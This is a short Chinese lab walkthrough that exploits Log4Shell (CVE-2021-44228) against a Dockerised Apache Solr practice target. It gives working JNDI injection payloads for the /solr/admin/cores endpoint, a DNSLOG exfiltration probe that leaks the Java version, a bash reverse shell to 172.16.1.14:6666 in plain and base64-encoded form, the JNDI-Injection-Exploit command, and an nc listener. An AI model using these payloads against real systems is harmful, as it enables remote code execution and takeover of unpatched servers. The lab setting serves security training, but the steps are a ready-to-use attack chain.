1.执行以下命令启动靶场环境并在浏览器访问
cd log4j/CVE-2021-44228
docker-compose up -d
docker ps
2.先在自己搭建的DNSLOG平台上获取⼀个域名来监控我们注⼊的效果
3.可以发现 /solr/admin/cores?action= 这⾥有个参数可以传,可以按照上⾯的原理 先构造⼀个请求传过去存在JNDI注⼊那么ldap服务端会执⾏我们传上去的payload然后在DNSLOG 平台上那⾥留下记录,我们可以看到留下了访问记录并且前⾯的参数被执⾏后给我们回显了java的版本号!
/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.m0uwxb.dnslog.cn
}
4.开始反弹Shell准备 JNDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!
JDNI项⽬地址
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
反弹shell
bash -i >& /dev/tcp/172.16.1.14/6666 0>&1
反弹Shell-base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xNC82NjY2IDA+JjE=
最终Payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xNC82NjY2IDA+JjE=
}|{base64,-d}|{bash,
-i}" -A "172.16.1.14"
5.服务器监听
nc -lvvp 6666
6.拿取JDK1.8并构造Payload且直接访问..可以看到网页被重定向到了我们的恶意类网址...
/solr/admin/cores?action=${jndi:ldap://172.16.1.14:1389/jvqmxl
}
${jndi:ldap://172.16.1.14:6666/uma7pn}